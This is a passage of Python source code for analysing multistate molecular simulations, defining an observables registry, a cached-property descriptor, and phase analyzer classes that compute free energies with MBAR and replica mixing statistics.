----------
name: str
Name of the observable, will be cast to all lower case and spaces replaced with underscores
error_class: "quad", "linear", or None
How the error of the observable is computed when added with other errors from the same observable.
* "quad": Adds in the quadrature, Observable C = A + B, Error eC = sqrt(eA**2 + eB**2)
* "linear": Adds linearly, Observable C = A + B, Error eC = eA + eB
* None: Does not carry error
re_register: bool, optional, Default: False
Re-register an existing observable
"""
self._register_observable(name, "two_state", error_class, re_register=re_register)
def register_one_state_observable(self, name: str,
error_class: Optional[str]=None,
re_register: bool=False):
"""
Register a new one state observable, or re-register an existing one.
Parameters
----------
name: str
Name of the observable, will be cast to all lower case and spaces replaced with underscores
error_class: "quad", "linear", or None
How the error of the observable is computed when added with other errors from the same observable.
* "quad": Adds in the quadrature, Observable C = A + B, Error eC = sqrt(eA**2 + eB**2)
* "linear": Adds linearly, Observable C = A + B, Error eC = eA + eB
* None: Does not carry error
re_register: bool, optional, Default: False
Re-register an existing observable
"""
self._register_observable(name, "one_state", error_class, re_register=re_register)
def register_phase_observable(self, name: str,
error_class: Optional[str]=None,
re_register: bool=False):
"""
Register a new observable defined by phaee, or re-register an existing one.
Parameters
----------
name: str
Name of the observable, will be cast to all lower case and spaces replaced with underscores
error_class: 'quad', 'linear', or None
How the error of the observable is computed when added with other errors from the same observable.
* 'quad': Adds in the quadrature, Observable C = A + B, Error eC = sqrt(eA**2 + eB**2)
* 'linear': Adds linearly, Observable C = A + B, Error eC = eA + eB
* None: Does not carry error
re_register: bool, optional, Default: False
Re-register an existing observable
"""
self._register_observable(name, "phase", error_class, re_register=re_register)
########################
# Define the observables
########################
@property
def observables(self):
"""
Set of observables which are derived from the subsets below
"""
observables = set()
for subset_key in self._observables:
observables |= self._observables[subset_key]
return tuple(observables)
# ------------------------------------------------
# Exclusive Observable categories
# The intersection of these should be the null set
# ------------------------------------------------
@property
def observables_defined_by_two_states(self):
"""
Observables that require an i and a j state to define the observable accurately between phases
"""
return self._get_observables('two_state')
@property
def observables_defined_by_single_state(self):
"""
Defined observables which are fully defined by a single state, and not by multiple states such as differences
"""
return self._get_observables('one_state')
@property
def observables_defined_by_phase(self):
"""
Observables which are defined by the phase as a whole, and not defined by any 1 or more states
e.g. Standard State Correction
"""
return self._get_observables('phase')
##########################################
# Define the observables which carry error
# This should be a subset of observables
##########################################
@property
def observables_with_error(self):
"""Determine which observables have error by inspecting the the error subsets"""
observables = set()
for subset_key in self._errors:
if subset_key is not None:
observables |= self._errors[subset_key]
return tuple(observables)
# ------------------------------------------------
# Exclusive Error categories
# The intersection of these should be the null set
# ------------------------------------------------
@property
def observables_with_error_adding_quadrature(self):
"""Observable C = A + B, Error eC = sqrt(eA**2 + eB**2)"""
return self._get_errors('quad')
@property
def observables_with_error_adding_linear(self):
"""Observable C = A + B, Error eC = eA + eB"""
return self._get_errors('linear')
@property
def observables_without_error(self):
return self._get_errors(None)
# ------------------
# Internal functions
# ------------------
def _get_observables(self, key):
return tuple(self._observables[key])
def _get_errors(self, key):
return tuple(self._errors[key])
@staticmethod
def _cast_observable_name(name) -> str:
return re.sub(" +", "_", name.lower())
def _register_observable(self, obs_name: str,
obs_calc_class: str,
obs_error_class: Union[None, str],
re_register: bool=False):
obs_name = self._cast_observable_name(obs_name)
if not re_register and obs_name in self.observables:
raise ValueError("{} is already a registered observable! "
"Consider setting re_register key!".format(obs_name))
self._check_obs_class(obs_calc_class)
self._check_obs_error_class(obs_error_class)
obs_name_set = {obs_name} # set(single_object) throws an error, set(string) splits each char
# Throw out existing observable if present (set difference)
for obs_key in self._observables:
self._observables[obs_key] -= obs_name_set
for obs_err_key in self._errors:
self._errors[obs_err_key] -= obs_name_set
# Add new observable to correct classifiers (set union)
self._observables[obs_calc_class] |= obs_name_set
self._errors[obs_error_class] |= obs_name_set
def _check_obs_class(self, obs_class):
assert obs_class in self._observables, "{} not a known observable class!".format(obs_class)
def _check_obs_error_class(self, obs_error):
assert obs_error is None or obs_error in self._errors, \
"{} not a known observable error class!".format(obs_error)
# Create a default registry and register some stock values
default_observables_registry = ObservablesRegistry()
default_observables_registry.register_two_state_observable('free_energy', error_class='quad')
default_observables_registry.register_two_state_observable('entropy', error_class='quad')
default_observables_registry.register_two_state_observable('enthalpy', error_class='quad')
# -----------------------------------------------------------------------------
# EXCEPTIONS.
# -----------------------------------------------------------------------------
class InsufficientData(Exception):
"""Raised when the data is not sufficient perform the requested analysis."""
pass
# -----------------------------------------------------------------------------
# CACHED PROPERTIES DESCRIPTOR.
# -----------------------------------------------------------------------------
class CachedProperty(object):
"""Analyzer helper descriptor of a cached value with a dependency graph.
Automatically takes care of invalidating the values of the cache
that depend on this property.
Parameters
----------
name : str
The name of the parameter in the cache.
dependencies : iterable of str
List of cached properties on which this property depends.
check_changes : bool, optional
If True, the cache dependencies will be invalidated only if
the new value differs from the old one (default is False).
default : object, optional
The default value in case the cache doesn't contain a value
for this. If a callable, this function must have the signature
``default(self, instance)``. It is also possible to define a
callable default through the ``default`` decorator. After the
first cache miss, the default value is cached. By default,
AttributeError is raised on a cache miss.
validator : callable, optional
A function to call before setting a new value with signature
``validator(self, instance, new_value)``. It is also possible
to define this through the ``validator`` decorator.
"""
def __init__(self, name, dependencies=(), check_changes=False,
default=AttributeError, validator=None):
# Reserved names.
# TODO make observables CachedProperties?
assert name != 'observables'
assert name != 'reporter'
# TODO use __setname__() when dropping Python 3.5 support.
self.name = name
self.dependencies = dependencies
self._default = default
self._validator = validator
self._check_changes = check_changes
def __get__(self, instance, owner_class=None):
# If called as a class descriptor, return the descriptor.
if instance is None:
return self
# Check if the value is cached and fall back to default value.
try:
value = instance._cache[self.name]
except KeyError:
value = self._get_default(instance)
# Cache default value for next use.
instance._update_cache(self.name, value, self._check_changes)
return value
def __set__(self, instance, new_value):
if self._validator is not None:
new_value = self._validator(self, instance, new_value)
instance._update_cache(self.name, new_value, self._check_changes)
def validator(self, validator):
return type(self)(self.name, self.dependencies, self._check_changes, self._default, validator)
def default(self, default):
return type(self)(self.name, self.dependencies, self._check_changes, default, self._validator)
def _get_default(self, instance):
if self._default is AttributeError:
err_msg = 'Reference before assignment {}.{}'.format(instance, self.name)
raise AttributeError(err_msg)
elif callable(self._default):
value = self._default(self, instance)
else:
value = self._default
return value
# ---------------------------------------------------------------------------------------------
# Phase Analyzers
# ---------------------------------------------------------------------------------------------
class PhaseAnalyzer(ABC):
"""
Analyzer for a single phase of a MultiState simulation.
Uses the reporter from the simulation to determine the location
of all variables.
To compute a specific observable in an implementation of this class, add it to the ObservableRegistry and then
implement a ``get_X`` where ``X`` is the name of the observable you want to compute. See the ObservablesRegistry for
information about formatting the observables.
Analyzer works in units of kT unless specifically stated otherwise. To convert back to a unit set, just multiply by
the .kT property.
A PhaseAnalyzer also needs an ObservablesRegistry to track how to handle each observable given implemented within
for things like error and cross-phase analysis.
Parameters
----------
reporter : multistate.MultiStateReporter instance
Reporter from MultiState which ties to the simulation data on disk.
name : str, Optional
Unique name you want to assign this phase, this is the name that will appear in :class:`MultiPhaseAnalyzer`'s.
If not set, it will be given the arbitrary name "phase#" where # is an integer, chosen in order that it is
assigned to the :class:`MultiPhaseAnalyzer`.
max_n_iterations : int, optional
The maximum number of iterations to analyze. If not provided, all
the iterations will be analyzed.
reference_states : tuple of ints, length 2, Optional, Default: (0,-1)
Integers ``i`` and ``j`` of the state that is used for reference in observables, "O". These values are only used
when reporting single numbers or combining observables through :class:`MultiPhaseAnalyzer` (since the number of
states between phases can be different). Calls to functions such as ``get_free_energy`` in a single Phase
results in the O being returned for all states.
For O completely defined by the state itself (i.e. no differences between states, e.g. Temperature),
only O[i] is used
For O where differences between states are required (e.g. Free Energy): O[i,j] = O[j] - O[i]
For O defined by the phase as a whole, the reference states are not needed.
analysis_kwargs : None or dict, optional
Dictionary of extra keyword arguments to pass into the analysis tool, typically MBAR.
For instance, the initial guess of relative free energies to give to MBAR would be something like:
``{'initial_f_k':[0,1,2,3]}``
use_online_data : bool, optional, Default: True
Attempt to read online analysis data as a way to hot-start the analysis computation. This will attempt to
read the data stored by the MultiStateAnalyzer.
If this is set to ``False``, the online analysis data is not read.
If this is set to ``False`` after being initialized, the :class:`CachedProperty` dependencies are all
invalidated and properties will be computed from scratch on next observables
If no online data is found, this setting has no effect
use_full_trajectory : bool, optional, Default: False
Force the analysis to use the full trajectory when automatically computing equilibration and decorrelation.
Normal behavior (when this is False) is to discard the initial trajectory due to automatic equilibration
detection, and then subsample that data to generate decorelated samples. Setting this to ``True`` ignores
this effect, even if the equilibration data is computed.
This can be changed after the ``PhaseAnalyzer`` has been created to re-compute properties with or without
the full trajectory.
registry : ObservablesRegistry instance
Instanced ObservablesRegistry with all observables implemented through a ``get_X`` function classified and
registered. Any cross-phase analysis must use the same instance of an ObservablesRegistry
Attributes
----------
name
observables
max_n_iterations
reference_states
n_iterations
n_replicas
n_states
kT
reporter
registry
use_online_data
use_full_trajectory
See Also
--------
ObservablesRegistry
"""
def __init__(self, reporter, name=None, reference_states=(0, -1),
max_n_iterations=None, analysis_kwargs=None,
registry=default_observables_registry,
use_online_data=True,
use_full_trajectory=False):
"""
The reporter provides the hook into how to read the data, all other options control where differences are
measured from and how each phase interfaces with other phases.
"""
# Arguments validation.
if not type(reporter) is multistate.MultiStateReporter:
raise ValueError('reporter must be a MultiStateReporter instance')
if not isinstance(registry, ObservablesRegistry):
raise ValueError("Registry must be an instanced ObservablesRegistry")
if analysis_kwargs is None:
analysis_kwargs = {}
elif not isinstance(analysis_kwargs, dict):
raise ValueError('analysis_kwargs must be either None or a dictionary')
self.registry = registry
if not reporter.is_open():
reporter.open(mode='r')
self._reporter = reporter
# Initialize cached observables so the phase can be retrieved once computed.
self._computed_observables = {observable: None for observable in self.observables}
# Internal properties
self._name = name
# Start as default sign +, handle all sign conversion at preparation time
self._sign = '+'
self._reference_states = None # Initialize the cache object.
self.reference_states = reference_states
self._user_extra_analysis_kwargs = analysis_kwargs # Store the user-specified (higher priority) keywords
# Initialize cached values that are read or derived from the Reporter.
self._cache = {} # This cache should be always set with _update_cache().
self.clear()
self.max_n_iterations = max_n_iterations
# Use full trajectory store or not
self.use_full_trajectory = use_full_trajectory
# Check the online data
self._online_data = None # Init the object
self._use_online_data = use_online_data
self._read_online_data_if_present()
def __del__(self):
# Explicitly close storage
self.clear()
if self._reporter is not None:
del self._reporter
def clear(self):
"""Reset all cached objects.
This must to be called if the information in the reporter changes
after analysis.
"""
# Reset cached values that are read directly from the Reporter.
self._n_iterations = None
self._n_replicas = None
self._end_thermodynamic_states = None
self._kT = None
# Reset cached values that are derived from the reporter.
self._invalidate_cache_values('reporter')
@property
def name(self):
"""User-readable string name of the phase"""
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def observables(self):
"""List of observables that the instanced analyzer can compute/fetch."""
# Auto-determine the computable observables by inspection of non-flagged methods
# We determine valid observables by negation instead of just having each child
# implement the method to enforce uniform function naming conventions.
observables = []
for observable in self.registry.observables:
if hasattr(self, "get_" + observable):
observables.append(observable)
# Cast observables to an immutable.
return tuple(observables)
@property
def reference_states(self):
"""Tuple of reference states ``i`` and ``j`` for :class:`MultiPhaseAnalyzer` instances"""
return self._reference_states
@reference_states.setter
def reference_states(self, value):
"""Provide a way to re-assign the ``i, j`` states in a protected way"""
i, j = value[0], value[1]
if type(i) is not int or type(j) is not int:
raise ValueError("reference_states must be a length 2 iterable of ints")
self._reference_states = (i, j)
@property
def n_iterations(self):
"""int: The total number of iterations of the phase."""
if self._n_iterations is None:
# The + 1 accounts for iteration 0.
self._n_iterations = self._reporter.read_last_iteration(last_checkpoint=False)
return self._n_iterations
@property
def n_replicas(self):
"""int: Number of replicas."""
if self._n_replicas is None:
replica_state_indices = self._reporter.read_replica_thermodynamic_states(iteration=0)
self._n_replicas = len(replica_state_indices)
return self._n_replicas
@property
def n_states(self):
"""int: Number of sampled thermodynamic states."""
return self._reporter.n_states
def _get_end_thermodynamic_states(self):
"""Read thermodynamic states at the ends of the protocol.
Returns
-------
end_thermodynamic_states : list of ThermodynamicState
The end thermodynamic states
"""
if self._end_thermodynamic_states is None:
self._end_thermodynamic_states = self._reporter.read_end_thermodynamic_states()
# Cache other useful informations since we have already read this.
# TODO should we read temperatures of all the states and let kT property depend on reference_states?
self._kT = self._end_thermodynamic_states[0].kT
return self._end_thermodynamic_states
@property
def kT(self):
"""
Quantity of boltzmann constant times temperature of the phase in units of energy per mol
Allows conversion between dimensionless energy and unit bearing energy
"""
if self._kT is None:
self._get_end_thermodynamic_states()
return self._kT
@property
def reporter(self):
"""Sampler Reporter tied to this object."""
return self._reporter
@reporter.setter
def reporter(self, value):
"""Make sure users cannot overwrite the reporter."""
raise ValueError("You cannot re-assign the reporter for this analyzer!")
@property
def use_online_data(self):
"""Get the online data flag"""
return self._use_online_data
@use_online_data.setter
def use_online_data(self, value):
"""Set the online data boolean"""
if type(value) != bool:
raise ValueError("use_online_data must be a boolean!")
if self._use_online_data is False and value is True:
# Re-read the online data
self._read_online_data_if_present()
elif self._use_online_data is True and value is False:
# Invalidate online data
self._online_data = None
# Re-form dict to prevent variables from referencing the same object
self._extra_analysis_kwargs = {**self._user_extra_analysis_kwargs}
self._use_online_data = value
# -------------------------------------------------------------------------
# Cached properties functions/classes.
# -------------------------------------------------------------------------
@classmethod
def _get_cache_dependency_graph(cls):
"""dict: cached_value -> list of cache values to invalidate."""
# Retrieve all cached properties.
cached_properties = {value for name, value in inspect.getmembers(cls)
if isinstance(value, CachedProperty)}
# Build the dependency graph.
dependency_graph = {}
for cached_property in cached_properties:
for dependency in cached_property.dependencies:
try:
dependency_graph[dependency].add(cached_property.name)
except KeyError:
dependency_graph[dependency] = {cached_property.name}
# Hard-code observable dependency since those are not CachedProperties.
# TODO make observables CachedProperties?
dependency_graph['mbar'] = {'observables'}
return dependency_graph
def _update_cache(self, key, new_value, check_changes=False):
"""Update the cache entry and invalidate the values that depend on it.
Parameters
----------
key : str
The name of the value to update.
new_value : object
The new value of the key.
check_changes : bool, optional
If True and the new value is equal to the current one,
the dependent cache values are not invalidated.
"""
invalidate_cache = True
try:
old_value = self._cache[key]
except KeyError:
invalidate_cache = False
else:
if check_changes and self._check_equal(old_value, new_value):
invalidate_cache = False
# Update value and invalidate the cache.
self._cache[key] = new_value
if invalidate_cache:
self._invalidate_cache_values(key)
def _invalidate_cache_values(self, key):
"""Invalidate all the cache dependencies of key.
Parameters
----------
key : str
The name of the cached whose dependencies must be invalidated.
"""
dependency_graph = self._get_cache_dependency_graph()
for k in dependency_graph[key]:
# Invalidate observables that are in a separate cache.
if k == 'observables':
for observable in self.observables:
self._computed_observables[observable] = None
else:
# Invalidate dependencies of k.
self._invalidate_cache_values(k)
# Remove k.
self._cache.pop(k, None)
@staticmethod
def _check_equal(old_value, new_value):
"""Broader equality check"""
try:
np.testing.assert_equal(old_value, new_value)
except AssertionError:
return False
return True
# -------------------------------------------------------------------------
# Cached properties.
# -------------------------------------------------------------------------
max_n_iterations = CachedProperty('max_n_iterations', check_changes=True)
@max_n_iterations.validator
def max_n_iterations(self, instance, new_value):
"""The maximum allowed value for max_n_iterations is n_iterations."""
if new_value is None or new_value > instance.n_iterations:
new_value = instance.n_iterations
return new_value
use_full_trajectory = CachedProperty('use_full_trajectory', check_changes=True)
@use_full_trajectory.validator
def use_full_trajectory(self, _, new_value):
if type(new_value) is not bool:
raise ValueError("use_full_trajectory must be a boolean!")
return new_value
_extra_analysis_kwargs = CachedProperty('_extra_analysis_kwargs', check_changes=True)
# -------------------------------------------------------------------------
# Abstract methods.
# -------------------------------------------------------------------------
def read_energies(self):
"""
Extract energies from the ncfile and order them by replica, state, iteration.
Returns
-------
sampled_energy_matrix : np.ndarray of shape [n_replicas, n_states, n_iterations]
Potential energy matrix of the sampled states.
unsampled_energy_matrix : np.ndarray of shape [n_replicas, n_unsamped_states, n_iterations]
Potential energy matrix of the unsampled states.
Energy from each drawn sample n, evaluated at unsampled state l.
If no unsampled states were drawn, this will be shape (0,N).
neighborhoods : np.ndarray of shape [n_replicas, n_states, n_iterations]
Neighborhood energies were computed at, uses a boolean mask over the energy_matrix.
replica_state_indices : np.ndarray of shape [n_replicas, n_iterations]
States sampled by the replicas in the energy_matrix
"""
# TODO: should we keep it unified and always truncate to max_n_iterations?
return self._read_energies(truncate_max_n_iterations=False)
def _read_energies(self, truncate_max_n_iterations=False):
"""
Extract energies from the ncfile and order them by replica, state, iteration.
Parameters
----------
truncate_max_n_iterations : bool, optional, default=False
If True, will truncate the data to self.max_n_iterations.
Returns
-------
sampled_energy_matrix : numpy.ndarray with shape (n_replicas, n_states, n_iterations)
``sampled_energy_matrix[replica, state, iteration]`` is the reduced potential of replica ``replica`` at sampled state ``state`` for iteration ``iteration``
unsampled_energy_matrix : numpy.ndarray with shape (n_replicas, n_states, n_iterations)
``unsampled_energy_matrix[replica, state, iteration]`` is the reduced potential of replica i at unsampled state j for iteration ``iteration``
neighborhoods : numpy.ndarray with shape (n_replicas, n_states, n_iterations)
``neighborhoods[replica, state, iteration]`` is 1 if the energy for replica ``replica`` at iteration ``iteration`` was computed for state ``state``, 0 otherwise
replica_state_indices : numpy.ndarray with shape (n_replicas, n_iterations)
``replica_state_indices[replica, iteration]`` is the thermodynamic state index sampled by replica ``replica`` at iteration ``iteration``
"""
logger.debug("Reading energies...")
# reporter_energies is [energy_sampled_states, neighborhoods, energy_unsampled_states].
energy_data = list(self._reporter.read_energies())
energy_data.append(self._reporter.read_replica_thermodynamic_states())
logger.debug("Done.")
# Truncate the number of iterations to self.max_n_iterations if requested.
if truncate_max_n_iterations:
for i, energies in enumerate(energy_data):
# The +1 accounts for minimization iteration.
energy_data[i] = energies[:self.max_n_iterations+1]
# Convert from (n_iterations, n_replicas, n_states) to (n_replicas, n_states, n_iterations).
for i, energies in enumerate(energy_data):
energy_data[i] = np.moveaxis(energies, 0, -1)
# Unpack.
sampled_energy_matrix, neighborhoods, unsampled_energy_matrix, replicas_state_indices = energy_data
# TODO: Figure out what format we need the data in to be useful for both global and local MBAR/WHAM
# For now, we simply can't handle analysis of non-global calculations.
if np.any(neighborhoods == 0):
raise Exception('Non-global MBAR analysis not implemented yet.')
return sampled_energy_matrix, unsampled_energy_matrix, neighborhoods, replicas_state_indices
@property
def has_log_weights(self):
"""
Return True if the storage has log weights, False otherwise
"""
try:
# Check that logZ and log_weights have per-iteration data
# If either of these return a ValueError, then no history data are available
_ = self._reporter.read_logZ(0)
_ = self._reporter.read_online_analysis_data(0, 'log_weights')
return True
except ValueError:
return False
def read_log_weights(self):
"""
Extract log weights from the ncfile, if present.
Returns ValueError if not present.
Returns
-------
log_weights : np.ndarray of shape [n_states, n_iterations]
log_weights[l,n] is the log weight applied to state ``l``
during the collection of samples at iteration ``n``
"""
log_weights = np.array(
self._reporter.read_online_analysis_data(slice(None, None), 'log_weights')['log_weights'])
log_weights = np.moveaxis(log_weights, 0, -1)
return log_weights
def read_logZ(self, iteration=None):
"""
Extract logZ estimates from the ncfile, if present.
Returns ValueError if not present.
Parameters
----------
iteration : int or slice, optional, default=None
If specified, iteration or slice of iterations to extract
Returns
-------
logZ : np.ndarray of shape [n_states, n_iterations]
logZ[l,n] is the online logZ estimate for state ``l`` at iteration ``n``
"""
if iteration == -1:
log_z = self._reporter.read_logZ(iteration)
else:
if iteration is not None:
log_z = self._reporter.read_online_analysis_data(iteration, "logZ")["logZ"]
else:
log_z = self._reporter.read_online_analysis_data(slice(0, None), "logZ")["logZ"]
log_z = np.moveaxis(log_z, 0, -1)
# We don't want logZ to be a masked array
log_z = np.array(log_z)
return log_z
def get_effective_energy_timeseries(self, energies=None, replica_state_indices=None):
"""
Generate the effective energy (negative log deviance) timeseries that is generated for this phase
The effective energy for a series of samples x_n, n = 1..N, is defined as
u_n = - \ln \pi(x_n) + c
where \pi(x) is the probability density being sampled, and c is an arbitrary constant.
Parameters
----------
energies : ndarray of shape (K,L,N), optional, Default: None
Energies from replicas K, sampled states L, and iterations N
If provided, then states input_sampled_states must also be provided
replica_state_indices : ndarray of shape (K,N), optional, Default: None
Integer indices of each sampled state (matching L dimension in input_energy)
that each replica K sampled every iteration N.
If provided, then states input_energies must also be provided
Returns
-------
u_n : ndarray of shape (N,)
u_n[n] is the negative log deviance of the same from iteration ``n``
Timeseries used to determine equilibration time and statistical inefficiency.
"""
raise NotImplementedError("This class has not implemented this function")
# -------------------------------------------------------------------------
# MBAR routines.
# -------------------------------------------------------------------------
@staticmethod
def reformat_energies_for_mbar(u_kln: np.ndarray, n_k: Optional[np.ndarray]=None):
"""
Convert [replica, state, iteration] data into [state, total_iteration] data
This method assumes that the first dimension are all samplers,
the second dimension are all the thermodynamic states energies were evaluated at
and an equal number of samples were drawn from each k'th sampler, UNLESS n_k is specified.
Parameters
----------
u_kln : np.ndarray of shape (K,L,N')
K = number of replica samplers
L = number of thermodynamic states,
N' = number of iterations from state k
n_k : np.ndarray of shape K or None
Number of samples each _SAMPLER_ (k) has drawn
This allows you to have trailing entries on a given kth row in the n'th (n prime) index
which do not contribute to the conversion.
If this is None, assumes ALL samplers have the same number of samples
such that N_k = N' for all k
**WARNING**: N_k is number of samples the SAMPLER drew in total,
NOT how many samples were drawn from each thermodynamic state L.
This method knows nothing of how many samples were drawn from each state.
Returns
-------
u_ln : np.ndarray of shape (L, N)
Reduced, non-sparse data format
L = number of thermodynamic states
N = \sum_k N_k. note this is not N'
"""
k, l, n = u_kln.shape
if n_k is None:
n_k = np.ones(k, dtype=np.int32)*n
u_ln = np.zeros([l, n_k.sum()])
n_counter = 0
for k_index in range(k):
u_ln[:, n_counter:n_counter + n_k[k_index]] = u_kln[k_index, :, :n_k[k_index]]
n_counter += n_k[k_index]
return u_ln
# Private Class Methods
def _create_mbar(self, energy_matrix, samples_per_state):
"""
Initialize MBAR for Free Energy and Enthalpy estimates, this may take a while.
This function is helpful for those who want to create a slightly different mbar object with different
parameters.
This function is hidden from the user unless they really, really need to create their own mbar object
Parameters
----------
energy_matrix : array of numpy.float64, optional, default=None
Reduced potential energies of the replicas.
samples_per_state : array of ints, optional, default=None
Number of samples drawn from each kth state.
"""
# Initialize MBAR (computing free energy estimates, which may take a while)
logger.debug("Computing free energy differences...")
self.mbar = MBAR(energy_matrix, samples_per_state, **self._extra_analysis_kwargs)
logger.debug('Done.')
return self.mbar
def _read_online_data_if_present(self):
"""
Attempt to read the online analysis data needed to hot-start the output
"""
try:
online_f_k = self.reporter.read_online_analysis_data(None, 'f_k')['f_k']
self._online_data = {'initial_f_k': online_f_k}
except ValueError:
self._online_data = None
# -------------------------------------------------------------------------
# Analysis combination.
# -------------------------------------------------------------------------
def _combine_phases(self, other, operator='+'):
"""
Workhorse function when creating a :class:`MultiPhaseAnalyzer` object by combining single
:class:`PhaseAnalyzer`s
"""
phases = [self]
names = []
signs = [self._sign]
# Reset self._sign
self._sign = '+'
if self.name is None:
names.append(multistate.utils.generate_phase_name(self.name, []))
else:
names.append(self.name)
if isinstance(other, MultiPhaseAnalyzer):
new_phases = other.phases
new_signs = other.signs
new_names = other.names
final_new_names = []
for name in new_names:
other_names = [n for n in new_names if n != name]
final_new_names.append(multistate.utils.generate_phase_name(name, other_names + names))
names.extend(final_new_names)
for new_sign in new_signs:
if operator != '+' and new_sign == '+':
signs.append('-')
else:
signs.append('+')
phases.extend(new_phases)
elif isinstance(other, PhaseAnalyzer):
names.append(multistate.utils.generate_phase_name(other.name, names))
if operator != '+' and other._sign == '+':
signs.append('-')
else:
signs.append('+')
# Reset the other's sign if it got set to negative
other._sign = '+'
phases.append(other)
else:
base_err = "cannot {} 'PhaseAnalyzer' and '{}' objects"
if operator == '+':
err = base_err.format('add', type(other))
else:
err = base_err.format('subtract', type(other))
raise TypeError(err)
phase_pass = {'phases': phases, 'signs': signs, 'names': names}
return MultiPhaseAnalyzer(phase_pass)
def __add__(self, other):
return self._combine_phases(other, operator='+')
def __sub__(self, other):
return self._combine_phases(other, operator='-')
def __neg__(self):
"""Internally handle the internal sign"""
if self._sign == '+':
self._sign = '-'
else:
self._sign = '+'
return self
class MultiStateSamplerAnalyzer(PhaseAnalyzer):
"""
The MultiStateSamplerAnalyzer is the analyzer for a simulation generated from a MultiStateSampler simulation,
implemented as an instance of the :class:`PhaseAnalyzer`.
Parameters
----------
unbias_restraint : bool, optional
If True and a radially-symmetric restraint was used in the simulation,
the analyzer will remove the bias introduced by the restraint by
reweighting each of the end-points to a state using a square-well
potential restraint.
restraint_energy_cutoff : float or 'auto', optional
When the restraint is unbiased, the analyzer discards all the samples
for which the restrain potential energy (in kT) is above this cutoff.
Effectively, this is equivalent to placing a hard wall potential at a
restraint distance such that the restraint potential energy is equal to
``restraint_energy_cutoff``.
If ``'auto'`` and ``restraint_distance_cutoff`` is ``None``, this will
be set to the 99.9-percentile of the distribution of the restraint energies
in the bound state.
restraint_distance_cutoff : openmm.unit.Quantity or 'auto', optional
When the restraint is unbiased, the analyzer discards all the samples
for which the distance between the restrained atoms is above this cutoff.
Effectively, this is equivalent to placing a hard wall potential at a
restraint distance ``restraint_distance_cutoff``.
If ``'auto'`` and ``restraint_energy_cutoff`` is not specified, this will
be set to the 99.9-percentile of the distribution of the restraint distances
in the bound state.
n_equilibration_iterations : int, optional
Number of iterations to discard due to equilibration.
If specified, overrides the n_equilibration_iterations computed using _get_equilibration_data().
Default is None, in which case n_equilibration_iterations will be computed using _get_equilibration_data().
statistical_inefficiency : float, optional
Sub-sample rate, e.g. if the statistical_inefficiency is 10, we draw a sample every 10 iterations to get the decorrelated samples.
If specified, overrides the statistical_inefficiency computed using _get_equilibration_data() and `n_equilibration_iterations`
must be specified as well.
Default is None, in which case the the statistical_inefficiency will be computed using _get_equilibration_data().
max_subset : int >= 1 or None, optional, default: 100
Argument in ``multistate.utils.get_equilibration_data_per_sample()`` that specifies the maximum number of points from
the ``timeseries_to_analyze`` (another argument to ``multistate.utils.get_equilibration_data_per_sample()``) on which
to compute equilibration data.
Attributes
----------
unbias_restraint
restraint_energy_cutoff
restraint_distance_cutoff
mbar
n_equilibration_iterations
statistical_inefficiency
See Also
--------
PhaseAnalyzer
"""
def __init__(self, *args, unbias_restraint=True, restraint_energy_cutoff='auto',
restraint_distance_cutoff='auto', n_equilibration_iterations=None, statistical_inefficiency=None, max_subset=100, **kwargs):
# Warn that API is experimental
logger.warn('Warning: The openmmtools.multistate API is experimental and may change in future releases')
# super() calls clear() that initialize the cached variables.
super().__init__(*args, **kwargs)
if statistical_inefficiency and n_equilibration_iterations is None:
raise Exception("Cannot specify statistical_inefficiency without n_equilibration_iterations, because " \
"otherwise n_equilibration_iterations cannot be computed for the given statistical_inefficiency.")
# Cached values with dependencies.
self.unbias_restraint = unbias_restraint
self.restraint_energy_cutoff = restraint_energy_cutoff
self.restraint_distance_cutoff = restraint_distance_cutoff
self._n_equilibration_iterations = n_equilibration_iterations
self._statistical_inefficiency = statistical_inefficiency
self._max_subset = max_subset
# TODO use class syntax and add docstring after dropping python 3.5 support.
_MixingStatistics = NamedTuple('MixingStatistics', [
('transition_matrix', np.ndarray),
('eigenvalues', np.ndarray),
('statistical_inefficiency', np.ndarray)
])
def clear(self):
"""Reset all cached objects.
This must to be called if the information in the reporter changes
after analysis.
"""
# Reset cached values that are read directly from the Reporter.
# super() takes care of invalidating the cached properties.
super().clear()
self._radially_symmetric_restraint_data = None
self._restraint_energies = {}
self._restraint_distances = {}
def generate_mixing_statistics(self, number_equilibrated: Union[int, None] = None) -> NamedTuple:
"""
Compute and return replica mixing statistics.
Compute the transition state matrix, its eigenvalues sorted from
greatest to least, and the state index correlation function.
Parameters
----------
number_equilibrated : int, optional, default=None
If specified, only samples ``number_equilibrated:end`` will
be used in analysis. If not specified, automatically retrieves
the number from equilibration data or generates it from the
internal energy.
Returns
-------
mixing_statistics : namedtuple
A namedtuple containing the following attributes:
- ``transition_matrix``: (nstates by nstates ``np.array``)
- ``eigenvalues``: (nstates-dimensional ``np.array``)
- ``statistical_inefficiency``: float
"""
# Read data from disk
if number_equilibrated is None:
number_equilibrated = self.n_equilibration_iterations
states = self._reporter.read_replica_thermodynamic_states()
n_states = self._reporter.n_states
n_ij = np.zeros([n_states, n_states], np.int64)
# Compute empirical transition count matrix.
for iteration in range(number_equilibrated, self.max_n_iterations - 1):
for i_replica in range(self.n_replicas):
i_state = states[iteration, i_replica]
j_state = states[iteration + 1, i_replica]
n_ij[i_state, j_state] += 1
# Compute transition matrix estimate.
# TODO: Replace with maximum likelihood reversible count estimator from msmbuilder or pyemma.
t_ij = np.zeros([n_states, n_states], np.float64)
for i_state in range(n_states):
# Cast to float to ensure we don't get integer division
denominator = float((n_ij[i_state, :].sum() + n_ij[:, i_state].sum()))
if denominator > 0:
for j_state in range(n_states):
t_ij[i_state, j_state] = (n_ij[i_state, j_state] + n_ij[j_state, i_state]) / denominator
else:
t_ij[i_state, i_state] = 1.0
# Estimate eigenvalues
mu = np.linalg.eigvals(t_ij)
mu = -np.sort(-mu) # Sort in descending order
# Compute state index statistical inefficiency of stationary data.
# states[n][k] is the state index of replica k at iteration n, but
# the functions wants a list of timeseries states[k][n].
states_kn = np.transpose(states[number_equilibrated:self.max_n_iterations,])
g = statistical_inefficiency_multiple(states_kn)
return self._MixingStatistics(transition_matrix=t_ij, eigenvalues=mu,
statistical_inefficiency=g)
def show_mixing_statistics(self, cutoff=0.05, number_equilibrated=None):
"""
Print summary of mixing statistics. Passes information off to generate_mixing_statistics then prints it out to
the logger
Parameters
----------
cutoff : float, optional, default=0.05
Only transition probabilities above 'cutoff' will be printed
number_equilibrated : int, optional, default=None
If specified, only samples number_equilibrated:end will be used in analysis
If not specified, it uses the internally held statistics best
"""
mixing_statistics = self.generate_mixing_statistics(number_equilibrated=number_equilibrated)
